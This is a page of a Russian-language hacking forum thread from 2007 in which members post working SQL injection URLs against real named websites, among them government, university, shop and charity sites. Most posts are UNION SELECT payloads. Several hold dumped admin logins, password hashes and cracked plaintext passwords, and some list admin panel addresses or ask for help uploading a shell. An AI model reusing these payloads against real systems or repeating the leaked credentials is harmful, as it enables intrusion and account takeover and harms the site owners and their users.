SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 108 of 798
  1. Barney

    Barney Elder - Старейшина

    Joined:
    11 Jan 2007
    Messages:
    78
    Likes Received:
    19
    Reputations:
    7
    http://director-online.com/buildArticle.php?id=1089'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
    до 30 дошел и забил... может я слепой =(
     
    #2141 Barney, 5 May 2007
  2. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    http://director-online.com/buildArticle.php?id=-1111+UNION+SELECT+1,2,3,4,5,6,7,8/*

    Пропустил

    .gov
    Code:
    http://www.sprk.gov.lv/index.php?id=-1111+UNION+SELECT+1,2,3,4,5,convert(VERSION()+using+latin1),7,8,9,10,11,12,13,14,15/*
     
    #2142 maxster, 5 May 2007
    Last edited: 5 May 2007
    1 person likes this.
  3. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Какой-то магазин

    Если кто-то узнает пасс от админки прошу стукнуть мне в ацку.Логин админа ABridge;)
     
    #2143 a1ex, 5 May 2007
  4. Barney

    Barney Elder - Старейшина

    Joined:
    11 Jan 2007
    Messages:
    78
    Likes Received:
    19
    Reputations:
    7
    http://www.gamesfirst.com/index.php?id=1132'+UNION+SELECT+1,2,3,5,6,7,8,9/*
    тут тоже наверное что-то есть...
    и тут
    http://www.dfalink.com/event.php?id=18354'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/*
    :confused:
     
    #2144 Barney, 5 May 2007
    Last edited: 5 May 2007
    1 person likes this.
  5. Серенький

    Серенький Banned

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    a1ex
    5:ABridge:9aac48d130bcb88c5f39065b4092a1d1

    А вообще - это уже было, смотри http://hlamidnik.h18.ru/SQLS.html

    Barney
    - то же самое.
     
    #2145 Серенький, 5 May 2007
  6. Barney

    Barney Elder - Старейшина

    Joined:
    11 Jan 2007
    Messages:
    78
    Likes Received:
    19
    Reputations:
    7
    http://www.reusablebags.com/facts.php?id=4'
    попытался, но как всегда что-то упускаю =))
    зы
    тут есть онлайн шоп, так что может что нить найдете интересного
     
    #2146 Barney, 5 May 2007
  7. Серенький

    Серенький Banned

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    boyan

    Barney
    Проверяй, пожалуйста, прежде чем публиковать - было или нет.
    http://hlamidnik.h18.ru/SQLS.html
    твоя ссылка там на 4х позициях )


    -----cont
    www.liverpoolfc.ru
    1:Jari:034054de62d75ca7:jokerit
     
    #2147 Серенький, 5 May 2007
    Last edited: 5 May 2007
    1 person likes this.
  8. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    Centre for Social Research on Alcohol and Drugs
    Code:
    http://www.sorad.su.se/projects.php?Id=-1111+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+from+admin/*
    Что-то там больше ничего нет =)
    _______________________________
    Фух, хитрые гады, долго пытался шел залить не смог...
    Если кто сможет отпишитесь и расскажите

    Code:
    http://www.resejournalen.se/destination.php?Id=-1111+UNION+SELECT+0x6e616d653a70617373776f7264,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12+from+phpbb_users+where+user_id=2/*

    Andreas:5bf39735e3e4966a31fa1f58d6a94a1d:Trustno0

    Еще 1 таже ситуация

    Code:
    http://www.sko.miun.se/page.php?kategori=35&underkategori=-1111+UNION+SELECT+1,concat_ws(0x3a,username,user_password),3,4,5,6,7+from+phpbb_users/*
    admin:ba952731f97fb058035aa399b1cb3d5c:karen

    там 2 форума, 1 основной, 2 левый (http://www.sko.miun.se/phpBB2/) это пасс от левого, т.к. префикс главного не угадал! =)
    __________________
    Веб админы блин

    Code:
    http://webxadmin.free.fr/article.php?i=-1111+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12/*
     
    #2148 maxster, 5 May 2007
    Last edited: 6 May 2007
  9. rObad

    rObad Member

    Joined:
    12 Apr 2007
    Messages:
    10
    Likes Received:
    9
    Reputations:
    0
    Филлипинский парламент
    Code:
    http://www.congress.gov.ph/press/details.php?pressid=-1+union+select+1,concat(user(),0x81,version(),0x81,database()),3,4,5,6,7,8--
     
    #2149 rObad, 6 May 2007
    3 people like this.
  10. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Очень интересно, смотрите сами:
    Code:
    http://www.188888.ru/download.php?file_id=-1+union+select+1/*
http://www.188888.ru/download.php?file_id=-1+union+select+1,2/*
    Ну а тут все понятно
    Code:
    http://www.box-cd.com/p_magazin.php?tip=1+union+select+1,version()/*
     
    #2150 Joker-jar, 6 May 2007
    1 person likes this.
  11. Серенький

    Серенький Banned

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql-not_finished

    Незавершенное:

    Сайт: http://www.password.ru/ (Каталог cайтов c красивым названием)
    http://password.ru/admin/admin.php

    Сайт: http://www.fc-arsenal.com/ (ARSSC: Официальный фан-клуб "Арсенала" в России)
    http://www.fc-arsenal.com/admin

    Сайт: http://www.fcalania.ru/ (АЛАНСКИЕ БАРСЫ. Сайт болельщиков ФК АЛАНИЯ)
    Готовое
    ----------------------------------------------------------------- вопросик
    Сайт: http://www.shinnik.yar.ru/ (Официальный сайт ФК Шинник)
    поглядим на версию и улыбнемся, так как она пятая)
    смотрим таблицы через системную бд information_schema
    и видим там таблицу nuke_users Но кавычки скринятся и не удается посмотреть названия полей в таблице -
    http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,column_name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+information_schema.columns+where+table_name='nuke_users'+limit+0,1/*
    не проходит,
    так вот вопрос - как это обойти, как изменить запрос, чтоб увидеть названия полей?

    *админка недалеко, вперед и направо - http://www.shinnik.yar.ru/admin.php

    upd. Скачал PostNuke, на котором построен сайт, посмотрел названия полей они все с префиксом pn_ так что
    искомые поля - pn_uid,pn_uname,pn_pass,pn_email
    2:admin:ff9830c42660c1dd1942844f8069b74a
    Пароль админа очень многозначительный - root123

    Вот, но вопрос в силе.
     
    #2151 Серенький, 6 May 2007
    Last edited: 6 May 2007
    2 people like this.
  12. Barney

    Barney Elder - Старейшина

    Joined:
    11 Jan 2007
    Messages:
    78
    Likes Received:
    19
    Reputations:
    7
    http://www.eurohs.eu.com/front-end/news-full.php?id=-1'
    http://www.neurope.eu/view_news.php?id=71989'
    (либо я пропустил, либо столбцов больше 20...)
     
    #2152 Barney, 6 May 2007
    1 person likes this.
  13. Серенький

    Серенький Banned

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    cont

    Barney
    используй order by
    http://www.neurope.eu/view_news.php?id=71989 order by 73/* и ранее ошибки нет
    http://www.neurope.eu/view_news.php?id=71989 order by 74/* - ошибка, и, значит, полей 73.
    нашел users(username,password,user_id)
     
    #2153 Серенький, 6 May 2007
    Last edited: 6 May 2007
    2 people like this.
  14. proZaik

    proZaik Banned

    Joined:
    11 Apr 2006
    Messages:
    15
    Likes Received:
    4
    Reputations:
    0
    Компания Берлин Хеми
    http://www.berlin-chemie.de/admin
    главный
    login:administrator pass:jnkg2ew
    отдельных разделов
    inter la8z7eo
    adm kjuhw2xy
    jobs tw8fqx2
    news x0el7ut
     
    #2154 proZaik, 6 May 2007
  15. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    \\\от меня скуль\\\
    Code:
    http://www.technischerhandel.de/haendler/single.php?id=-1160+union+select+1,2,version(),4,database(),6,7,8,9,10,11,12,13,14,15,16+from+mysql.user/*
     
    #2155 Constantine, 6 May 2007
    3 people like this.
  16. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    flydortmund.com

    Code:
    http://www.flydortmund.com/daten/in0_4.php?ALL_ID=-2+union+select+1,concat(user(),CHAR(58),VERSION()),3,4,5/*

    www.nieuwsshow.nl

    Code:
    http://www.nieuwsshow.nl/PHP/all.php?all_ID=-1+UNION+SELECT+1,concat(user(),CHAR(58),VERSION()),3,4,5,6/*
     
    #2156 zl0ba, 6 May 2007
    3 people like this.
  17. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    EvoWeb

    Code:
    http://evonet.lri.fr/evoweb/news_events/news_features/article.php?id=-1111+UNION+SELECT+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12+from+user+limit+0,1/*
    лимитом крутить можно

    _______________________

    The Lesbian & Gay Foundation

    Code:
    http://www.lgf.org.uk/lgf_category.php?ID=-1111+UNION+SELECT+1,concat_ws(0x3a,username,password),3,4+from+users/*
    admin:eek:rangecat172006
     
    #2157 maxster, 6 May 2007
    Last edited: 6 May 2007
    2 people like this.
  18. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    www.maineservicecommission.gov
    Code:
    http://www.maineservicecommission.gov/news/release.php?ID=-252+union+select+1,2,user(),version(),database(),6,7,8,9,10,11,12/*
    таблицы: admin, news, user
    админ панель: www.maineservicecommission.gov/hub/login.php

    www.psat.wa.gov
    Code:
    http://www.psat.wa.gov/Publications/news_stories/hoodcanal_news_story.php?id=-131+union+select+1,2,3,4,convert(concat(user(),char(58),version(),char(58),database())+using+latin1),6,7,8+user/*
    www.cherp.research.med.va.gov
    Code:
    http://www.cherp.research.med.va.gov/pr_read.php?id=-75+union+select+user(),2,version(),4,database(),6/*
    таблицы: tbl_personnel, tbl_press_releases

    www.y12.doe.gov
    Code:
    http://www.y12.doe.gov/news/release.php?id=-38+union+select+1,password,3,4,database(),6,version(),user(),user,10+from+mysql.user/*
    www.serti.ru
    Code:
    http://www.serti.ru/pages.php?id=-2768+union+select+1,2,concat(user,0x3a,pass)+from+admin/*
    dexm:dexmmm
     
    #2158 KPOT_f!nd, 7 May 2007
    Last edited: 7 May 2007
    4 people like this.
  19. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    http://una.ge/eng/artdetail.php?group=articles&id=102%20UNION%20SELECT%201,2,concat(loginname,0x3a,password),4,5,6,7,8,9%20from%20phplist_admin%20limit%201,1/*
    или так

    http://una.ge/eng/artdetail.php?group=articles&id=102%20UNION%20SELECT%201,2,concat(name,0x3a,passwd),4,5,6,7,8,9%20from%20user%20limit%201,1/*

    вот еще

    http://rustavi2.com/news/news_text.php?id_news=20582%20UNION%20SELECT%201,2,3,4,5,usrname,pass,8,9,10,11,12%20from%20users_p%20limit%201,1/*
     
    #2159 Scipio, 7 May 2007
    Last edited: 7 May 2007
  20. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    parametrix.ru
    natalie:parametr:parametrix.ru
    roma:roma:parametrix.ru
    parametrix:5086164

    www.mc.uky.edu
    1:tasize0:test1
    2:bloft2:cpst1admin

    админки не нашел \=
     
    #2160 p-range, 7 May 2007
    3 people like this.
(You must log in or sign up to post here.)
Page 108 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.